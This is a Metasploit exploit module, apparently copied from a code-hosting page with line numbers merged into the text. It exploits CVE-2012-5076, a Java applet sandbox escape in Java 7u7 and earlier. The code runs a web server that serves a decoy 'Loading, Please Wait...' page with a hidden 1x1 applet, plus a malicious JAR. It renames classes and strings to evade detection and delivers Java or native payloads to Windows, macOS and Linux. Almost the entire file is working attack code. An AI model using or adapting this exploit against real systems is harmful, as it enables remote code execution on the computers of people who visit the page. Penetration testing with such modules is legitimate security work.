Path: blob/master/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb
32717 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpServer::HTML9include Msf::Exploit::EXE1011# include Msf::Exploit::Remote::BrowserAutopwn12# autopwn_info({ :javascript => false })1314def initialize(info = {})15super(16update_info(17info,18'Name' => 'Java Applet AverageRangeStatisticImpl Remote Code Execution',19'Description' => %q{20This module abuses the AverageRangeStatisticImpl from a Java Applet to run21arbitrary Java code outside of the sandbox, a different exploit vector than the one22exploited in the wild in November of 2012. The vulnerability affects Java version237u7 and earlier.24},25'License' => MSF_LICENSE,26'Author' => [27'Unknown', # Vulnerability discovery at security-explorations28'juan vazquez' # Metasploit module29],30'References' => [31[ 'CVE', '2012-5076' ],32[ 'OSVDB', '86363' ],33[ 'BID', '56054' ],34[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ],35[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5076' ],36[ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]37],38'Payload' => { 'Space' => 20480, 'DisableNops' => true },39'Targets' => [40[41'Generic (Java Payload)',42{43'Platform' => ['java'],44'Arch' => ARCH_JAVA45}46],47[48'Windows x86 (Native Payload)',49{50'Platform' => 'win',51'Arch' => ARCH_X8652}53],54[55'Mac OS X x86 (Native Payload)',56{57'Platform' => 'osx',58'Arch' => ARCH_X8659}60],61[62'Linux x86 (Native Payload)',63{64'Platform' => 'linux',65'Arch' => ARCH_X8666}67],68],69'DefaultTarget' => 0,70'DisclosureDate' => '2012-10-16',71'Notes' => {72'Reliability' => UNKNOWN_RELIABILITY,73'Stability' => UNKNOWN_STABILITY,74'SideEffects' => UNKNOWN_SIDE_EFFECTS75}76)77)78end7980def setup81path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-5076_2', 'Exploit.class')82@exploit_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }83path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-5076_2', 'B.class')84@loader_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }8586@exploit_class_name = rand_text_alpha('Exploit'.length)87@exploit_class.gsub!('Exploit', @exploit_class_name)88super89end9091def on_request_uri(cli, request)92print_status("handling request for #{request.uri}")9394case request.uri95when /\.jar$/i96jar = payload.encoded_jar97jar.add_file("#{@exploit_class_name}.class", @exploit_class)98jar.add_file('B.class', @loader_class)99metasploit_str = rand_text_alpha('metasploit'.length)100payload_str = rand_text_alpha('payload'.length)101jar.entries.each do |entry|102entry.name.gsub!('metasploit', metasploit_str)103entry.name.gsub!('Payload', payload_str)104entry.data = entry.data.gsub('metasploit', metasploit_str)105entry.data = entry.data.gsub('Payload', payload_str)106end107jar.build_manifest108109send_response(cli, jar, { 'Content-Type' => 'application/octet-stream' })110when %r{/$}111payload = regenerate_payload(cli)112if !payload113print_error('Failed to generate the payload.')114send_not_found(cli)115return116end117send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })118else119send_redirect(cli, get_resource + '/', '')120end121end122123def generate_html124html = %(<html><head><title>Loading, Please Wait...</title></head>)125html += %(<body><center><p>Loading, Please Wait...</p></center>)126html += %(<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">)127html += %(</applet></body></html>)128return html129end130end131132133